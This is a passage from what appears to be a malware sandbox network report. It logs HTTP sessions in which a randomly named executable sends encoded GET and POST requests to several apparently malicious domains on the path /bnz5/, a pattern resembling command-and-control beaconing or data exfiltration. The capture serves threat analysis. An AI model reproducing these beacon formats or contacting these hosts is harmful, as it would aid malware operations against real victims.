eZeRjmjR3OdipYUiFQ==
                                                                                                      Apr 16, 2024 12:00:14.550072908 CEST398INHTTP/1.1 404 Not Found
                                                                                                      Server: nginx
                                                                                                      Date: Tue, 16 Apr 2024 10:00:14 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Access-Control-Allow-Origin: *
                                                                                                      Access-Control-Allow-Methods: *
                                                                                                      Access-Control-Allow-Headers: Content-Type,Access-Token,Appid,Secret,Authorization,Token
                                                                                                      Content-Encoding: gzip
                                                                                                      Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 140


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      12192.168.2.54973143.132.191.179802940C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Apr 16, 2024 12:00:18.080573082 CEST451OUTGET /bnz5/?gr=J5sdn6UHwrTFsLl7PSE+273sNdFQMS+e/Eepb66AdUMKjr/OxnnLPWtAHrBNDsqMNKwlUYW9tPjJnamC/Yv4erSiZvDT3TM3BG/s9HlMNwb39HB/smoNNYSAbH35aGk1gA==&kFGTX=Q6OxIXo8tXD HTTP/1.1
                                                                                                      Host: www.vvbgsekbo.store
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Apr 16, 2024 12:00:18.436594963 CEST348INHTTP/1.1 404 Not Found
                                                                                                      Server: nginx
                                                                                                      Date: Tue, 16 Apr 2024 10:00:18 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Access-Control-Allow-Origin: *
                                                                                                      Access-Control-Allow-Methods: *
                                                                                                      Access-Control-Allow-Headers: Content-Type,Access-Token,Appid,Secret,Authorization,Token
                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      13192.168.2.54973291.195.240.117802940C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Apr 16, 2024 12:00:23.804136038 CEST715OUTPOST /bnz5/ HTTP/1.1
                                                                                                      Host: www.mytemplotech.com
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 203
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.mytemplotech.com
                                                                                                      Referer: http://www.mytemplotech.com/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Data Raw: 67 72 3d 37 31 38 76 4d 45 5a 2f 59 7a 6c 61 4e 6e 35 48 6c 77 6d 56 4a 42 4c 7a 36 42 6f 6b 76 35 4f 67 51 47 7a 76 4c 54 73 6b 32 4e 39 49 44 38 78 52 72 70 41 2b 58 70 2f 4a 55 7a 6b 58 73 55 4d 4b 7a 6a 6b 2f 5a 49 37 6a 2b 78 33 4a 62 42 36 31 6f 4c 64 66 6a 54 79 61 66 71 4d 73 53 49 51 73 4e 33 58 51 6f 50 56 4b 50 35 34 44 72 43 37 41 63 31 35 32 64 4a 72 34 4a 47 7a 48 76 65 44 38 58 59 30 50 62 68 61 52 77 41 65 71 77 6c 70 43 4e 65 54 62 4c 62 78 38 5a 2b 48 74 32 6f 30 38 59 6f 65 63 48 2f 4f 4f 45 6c 53 36 57 30 47 63 61 58 52 34 46 47 7a 67 6d 53 45 66 4a 45 75 59 42 70 6c 4b 73 75 77 3d
                                                                                                      Data Ascii: gr=718vMEZ/YzlaNn5HlwmVJBLz6Bokv5OgQGzvLTsk2N9ID8xRrpA+Xp/JUzkXsUMKzjk/ZI7j+x3JbB61oLdfjTyafqMsSIQsN3XQoPVKP54DrC7Ac152dJr4JGzHveD8XY0PbhaRwAeqwlpCNeTbLbx8Z+Ht2o08YoecH/OOElS6W0GcaXR4FGzgmSEfJEuYBplKsuw=
                                                                                                      Apr 16, 2024 12:00:24.015396118 CEST701INHTTP/1.1 405 Not Allowed
                                                                                                      date: Tue, 16 Apr 2024 10:00:23 GMT
                                                                                                      content-type: text/html
                                                                                                      content-length: 556
                                                                                                      server: NginX
                                                                                                      connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      14192.168.2.54973391.195.240.117802940C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Apr 16, 2024 12:00:26.544164896 CEST735OUTPOST /bnz5/ HTTP/1.1
                                                                                                      Host: www.mytemplotech.com
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 223
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.mytemplotech.com
                                                                                                      Referer: http://www.mytemplotech.com/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Data Raw: 67 72 3d 37 31 38 76 4d 45 5a 2f 59 7a 6c 61 4d 48 70 48 67 54 4f 56 5a 52 4c 30 32 68 6f 6b 6c 5a 4f 6b 51 47 2f 76 4c 53 59 30 31 37 74 49 44 64 68 52 6c 49 41 2b 57 70 2f 4a 62 54 6c 64 6f 55 4d 37 7a 6b 73 42 5a 49 33 6a 2b 78 6a 4a 62 44 69 31 6f 38 42 63 69 44 79 63 47 61 4d 69 50 59 51 73 4e 33 58 51 6f 4f 6c 6b 50 35 51 44 72 7a 4c 41 63 57 68 31 42 35 72 37 44 6d 7a 48 6c 2b 44 77 58 59 30 74 62 67 47 2f 77 43 6d 71 77 67 56 43 4d 4d 37 55 43 62 78 2b 64 2b 47 6f 32 4e 5a 6e 59 72 47 76 4b 66 54 4a 53 6d 58 45 58 43 72 32 41 31 5a 51 57 6d 66 59 32 42 4d 6f 59 30 50 78 62 4b 31 36 79 35 6d 4d 78 6e 69 34 62 64 79 56 31 50 41 54 77 69 46 2f 78 32 6e 67
                                                                                                      Data Ascii: gr=718vMEZ/YzlaMHpHgTOVZRL02hoklZOkQG/vLSY017tIDdhRlIA+Wp/JbTldoUM7zksBZI3j+xjJbDi1o8BciDycGaMiPYQsN3XQoOlkP5QDrzLAcWh1B5r7DmzHl+DwXY0tbgG/wCmqwgVCMM7UCbx+d+Go2NZnYrGvKfTJSmXEXCr2A1ZQWmfY2BMoY0PxbK16y5mMxni4bdyV1PATwiF/x2ng
                                                                                                      Apr 16, 2024 12:00:26.756022930 CEST701INHTTP/1.1 405 Not Allowed
                                                                                                      date: Tue, 16 Apr 2024 10:00:26 GMT
                                                                                                      content-type: text/html
                                                                                                      content-length: 556
                                                                                                      server: NginX
                                                                                                      connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      15192.168.2.54973491.195.240.117802940C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Apr 16, 2024 12:00:29.276652098 CEST1752OUTPOST /bnz5/ HTTP/1.1
                                                                                                      Host: www.mytemplotech.com
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 1239
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.mytemplotech.com
                                                                                                      Referer: http://www.mytemplotech.com/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Data Raw: 67 72 3d 37 31 38 76 4d 45 5a 2f 59 7a 6c 61 4d 48 70 48 67 54 4f 56 5a 52 4c 30 32 68 6f 6b 6c 5a 4f 6b 51 47 2f 76 4c 53 59 30 31 37 6c 49 44 71 68 52 71 4c 6f 2b 45 5a 2f 4a 53 7a 6c 65 6f 55 4d 69 7a 6c 4a 47 5a 49 4b 42 2b 7a 62 4a 61 67 71 31 68 70 31 63 6f 44 79 63 62 71 4d 6a 53 49 51 39 4e 33 48 55 6f 4f 56 6b 50 35 51 44 72 78 44 41 4c 56 35 31 44 35 72 34 4a 47 7a 78 76 65 43 74 58 59 4d 58 62 67 79 42 6c 69 47 71 77 41 6c 43 41 66 54 55 41 37 78 34 61 2b 47 4f 32 4e 64 43 59 6f 6a 57 4b 63 50 76 53 6d 66 45 56 48 47 52 61 55 46 4f 58 33 37 67 77 68 4a 50 46 45 44 58 47 62 31 62 2f 6f 79 43 77 31 32 34 59 62 53 52 2b 73 74 32 78 6e 55 6b 39 42 61 57 63 78 63 4a 33 61 4d 36 4d 46 6d 64 4d 68 38 42 2b 65 54 4d 2b 36 59 4e 59 73 72 78 53 66 78 68 70 50 69 71 53 52 6f 79 62 54 44 44 42 4f 71 4b 67 34 62 48 4e 64 54 47 78 4d 74 51 78 37 34 71 6a 31 37 32 59 6c 34 68 67 37 43 61 50 50 32 5a 78 6a 76 56 45 71 58 48 48 64 53 30 41 6e 70 62 62 67 57 71 4e 4f 44 4b 69 55 4c 61 43 63 5a 46 4a 37 36 6b 78 7a 62 55 38 42 57 71 63 71 44 76 2b 38 37 6d 75 5a 46 58 53 2f 6d 34 7a 7a 59 53 79 63 38 6c 78 6e 35 51 47 39 6a 52 53 69 49 6f 32 6c 55 34 61 56 34 76 79 4e 74 38 79 59 6a 67 41 35 64 32 4f 6b 76 63 4c 7a 66 56 6b 39 6a 44 43 72 68 76 61 30 70 74 55 68 44 70 46 62 74 45 7a 64 76 6e 66 6b 49 44 51 69 6e 74 72 74 6b 72 30 45 4e 64 36 2b 38 58 66 49 66 49 35 33 4c 77 59 70 61 65 36 32 71 38 2f 5a 4b 31 75 36 74 32 2b 33 6e 75 46 6c 55 33 56 6a 6e 55 46 58 33 4c 4f 77 4e 56 6e 50 6d 65 72 6d 76 46 5a 4b 67 4f 61 37 4f 2b 2b 64 33 63 43 59 7a 4d 42 2f 36 30 35 5a 75 41 6f 66 73 57 48 52 72 51 38 4c 5a 51 54 6e 66 54 6e 4b 46 48 51 76 73 2b 44 6c 44 6f 30 4c 59 4f 6d 61 67 33 53 34 77 71 73 6a 57 65 75 47 36 47 6c 59 61 74 62 39 6d 34 6f 35 77 74 75 2b 57 44 63 7a 76 77 4e 70 38 38 55 6a 45 68 36 6c 4e 66 6c 76 77 44 6d 51 64 51 66 76 6c 41 31 45 45 70 70 6b 72 78 4f 45 4c 33 50 68 49 6f 56 38 63 67 54 42 71 64 4e 6f 64 64 71 43 30 70 44 38 6f 6e 51 6f 4d 57 38 2f 75 70 77 42 76 35 69 67 34 38 32 4b 39 76 2b 50 62 45 35 42 64 50 64 41 55 33 4a 6b 35 4b 57 64 50 71 2b 5a 39 4d 52 51 56 4d 32 79 30 79 6a 2f 79 34 48 52 34 7a 4b 56 64 57 39 71 65 53 55 67 61 77 56 5a 59 4d 61 35 72 6d 69 45 75 57 6f 67 6c 6f 43 6e 74 72 4e 4c 42 33 6a 6a 56 64 30 55 39 56 73 67 4c 67 37 36 70 65 4e 2f 62 52 78 52 38 76 73 36 47 6b 52 48 37 6f 73 5a 63 34 76 38 4a 5a 6e 4d 78 79 49 43 44 59 64 55 49 30 77 44 72 70 41 71 37 41 57 76 6a 48 37 37 51 47 4d 57 6a 39 64 4b 35 61 42 54 7a 44 52 66 32 6d 34 38 4d 6e 39 63 56 75 49 7a 30 2b 52 54 64 4e 71 69 45 55 68 4a 4d 36 4f 46 6f 71 76 69 42 73 6c 61 6c 6c 6d 6b 2f 4f 55 48 7a 2b 7a 2b 55 76 7a 4b 63 33 30 77 68 72 56 59 5a 49 77 6b 78 41 30 4e 6c 45 72 6b 74 69 35 50 77 6e 56 57 75 59 69 46 6c 6c 6a 75 5a 63 73 30 61 72 2b 72 6f 69 37 6c 42 76 59 37 67 6a 66 4f 64 48 30 71 6f 54 35 55 58 50 44 42 51 37 46 39 58 42 71 6c 54 4b 68 4c 49 4f 64 59 2f 74 38 4c 70 65 48 70 64 35 6c 4b 6e 67 6a 6f 33 42 2b 49 63 47 44 46 47 36 57 77 74 50 6a 44 56 57 6b 5a 6f 33 4a 71 67 78 6f 79 77 5a 6c 58 44 42 49 2f 4e 49 37 2b 76 39 46 73 54 65 64 6b 64 6c 4f 6c 58 65 6b 78 59 56 79 56 73 45 33 6c 6f 65 32 36 49 39 32 51 69 2b 56 54 65 4c 71 59 66 55 48 41 6b 35 51 36 58 52 69 74 45 53 55 79 53 50 39 45 68 76 44 6f 50 64 7a 6e 4d 50 6f 76 44 54 71 75 47 4d 2b 68 34 52 2f 66 77 65 32 5a 54 6a 75 6a 4c 75 6b 46 75 74 78 72 30 32 4a 64 64 47 4b 63 6b 77 4b 58 66 31 30 49 4b 39 78 66 4a 34 62 37 75 38 39 51 6c 42 34 43 55 2f 4b 39 48 31 38 72 66 31 42 34 6c 32 51 75 35 64 32 48 78 49 31 37 63 61 62 4d 37 6a 4a 2f 76 77 61 62 43 66 35 66 79 4e 34 56 73 77 50 34 35 72 58 2b 66 37 49 38 6d 50 48 68 50 4c 44 78 54 69 47 6a 57 58 6c 6e 6c 71 79 67 3d 3d
                                                                                                      Data Ascii: gr=718vMEZ/YzlaMHpHgTOVZRL02hoklZOkQG/vLSY017lIDqhRqLo+EZ/JSzleoUMizlJGZIKB+zbJagq1hp1coDycbqMjSIQ9N3HUoOVkP5QDrxDALV51D5r4JGzxveCtXYMXbgyBliGqwAlCAfTUA7x4a+GO2NdCYojWKcPvSmfEVHGRaUFOX37gwhJPFEDXGb1b/oyCw124YbSR+st2xnUk9BaWcxcJ3aM6MFmdMh8B+eTM+6YNYsrxSfxhpPiqSRoybTDDBOqKg4bHNdTGxMtQx74qj172Yl4hg7CaPP2ZxjvVEqXHHdS0AnpbbgWqNODKiULaCcZFJ76kxzbU8BWqcqDv+87muZFXS/m4zzYSyc8lxn5QG9jRSiIo2lU4aV4vyNt8yYjgA5d2OkvcLzfVk9jDCrhva0ptUhDpFbtEzdvnfkIDQintrtkr0ENd6+8XfIfI53LwYpae62q8/ZK1u6t2+3nuFlU3VjnUFX3LOwNVnPmermvFZKgOa7O++d3cCYzMB/605ZuAofsWHRrQ8LZQTnfTnKFHQvs+DlDo0LYOmag3S4wqsjWeuG6GlYatb9m4o5wtu+WDczvwNp88UjEh6lNflvwDmQdQfvlA1EEppkrxOEL3PhIoV8cgTBqdNoddqC0pD8onQoMW8/upwBv5ig482K9v+PbE5BdPdAU3Jk5KWdPq+Z9MRQVM2y0yj/y4HR4zKVdW9qeSUgawVZYMa5rmiEuWogloCntrNLB3jjVd0U9VsgLg76peN/bRxR8vs6GkRH7osZc4v8JZnMxyICDYdUI0wDrpAq7AWvjH77QGMWj9dK5aBTzDRf2m48Mn9cVuIz0+RTdNqiEUhJM6OFoqviBslallmk/OUHz+z+UvzKc30whrVYZIwkxA0NlErkti5PwnVWuYiFlljuZcs0ar+roi7lBvY7gjfOdH0qoT5UXPDBQ7F9XBqlTKhLIOdY/t8LpeHpd5lKngjo3B+IcGDFG6WwtPjDVWkZo3JqgxoywZlXDBI/NI7+v9FsTedkdlOlXekxYVyVsE3loe26I92Qi+VTeLqYfUHAk5Q6XRitESUySP9EhvDoPdznMPovDTquGM+h4R/fwe2ZTjujLukFutxr02JddGKckwKXf10IK9xfJ4b7u89QlB4CU/K9H18rf1B4l2Qu5d2HxI17cabM7jJ/vwabCf5fyN4VswP45rX+f7I8mPHhPLDxTiGjWXlnlqyg==
                                                                                                      Apr 16, 2024 12:00:29.487752914 CEST701INHTTP/1.1 405 Not Allowed
                                                                                                      date: Tue, 16 Apr 2024 10:00:29 GMT
                                                                                                      content-type: text/html
                                                                                                      content-length: 556
                                                                                                      server: NginX
                                                                                                      connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      16192.168.2.54973591.195.240.117802940C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Apr 16, 2024 12:00:32.010354042 CEST452OUTGET /bnz5/?kFGTX=Q6OxIXo8tXD&gr=23UPPxRjGSNUJTgmtj2qEyLz/ntkvqKRRFHtLj5W9bo9CLdZgto2DYnNUhYakwcl0jYhNZjG9CPBZRuAkcQvlwifYrEIa7IdBg/GlOURZYl7vwvnI0pSC8vNdE3Ml+j1JA== HTTP/1.1
                                                                                                      Host: www.mytemplotech.com
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Apr 16, 2024 12:00:32.226129055 CEST107INHTTP/1.1 436
                                                                                                      date: Tue, 16 Apr 2024 10:00:32 GMT
                                                                                                      content-length: 0
                                                                                                      server: NginX
                                                                                                      connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      17192.168.2.54973691.195.240.117802940C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Apr 16, 2024 12:00:37.591880083 CEST709OUTPOST /bnz5/ HTTP/1.1
                                                                                                      Host: www.othlastore.com
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 203
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.othlastore.com
                                                                                                      Referer: http://www.othlastore.com/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
